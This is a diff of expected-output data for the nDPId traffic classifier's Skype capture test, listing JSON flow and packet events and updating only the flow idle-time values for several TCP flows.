00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZzYAAEARkAPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431969643092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969643092,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1yqcAQLnbD6CBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAgABBfOIaY="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABDNYcAAEARwa\/AqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABD3H8AAEARGrfAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7eVIAAEARfezAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} @@ -78,8 +78,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+7pYAAEARCKXAqAEiwKgBAf4VADUAKsDYd8YBAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAABwAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1431969643486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969643486,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1twAAEARIFPAqAEiwKgBAd\/IADUANro4UU4BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAABwAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431969643486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969643486,"pkt":"0NQSxnP1PBXCt3IOCABFAABKJUgAAEAR0efAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643944,"flow_last_seen":1431969643944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643944,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643944,"flow_last_seen":1431969643944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643944,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431969643971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643971,"pkt":"0NQSxnP1PBXCt3IOCABFAABLW5oAAEARm5TAqAEiwKgBAeuAADUAN9PqYyoBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -89,8 +89,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431969644054,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969644054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xBwAAEARMyPAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXA0AAEARmyzAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi\/oAAEARaz\/AqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431969644100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969644100,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIgG7w24uYYHqXFDkPKASOJC9NAAAAgQFrAQCCApNl5zhPiKRcAEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431969644100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969644100,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0M2pAAEAGJTfAqAEiQTffIcNuAbtcUOQ8LmGB64AQECwTyAAAAQEICj4ikgdNl5zh"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431969644100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969644100,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIgG7w24uYYHqXFDkPKASOJC9NAAAAgQFrAQCCApNl5zhPiKRcAEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431969644100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969644100,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0M2pAAEAGJTfAqAEiQTffIcNuAbtcUOQ8LmGB64AQECwTyAAAAQEICj4ikgdNl5zh"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431969644284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969644284,"pkt":"0NQSxnP1PBXCt3IOCABFAABDbaEAAEARiZXAqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1431969644285,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969644285,"pkt":"0NQSxnP1PBXCt3IOCABFAABDF2AAAEAR39bAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1431969644431,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969644431,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7zZ4AAEARKaDAqAEiwKgBAf+SADUAJwCOlegBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} @@ -109,10 +109,10 @@ 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431969648274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431969648274,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRAosAAAQRAXHAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431969648291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431969648291,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHAowAAAQRATrAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} 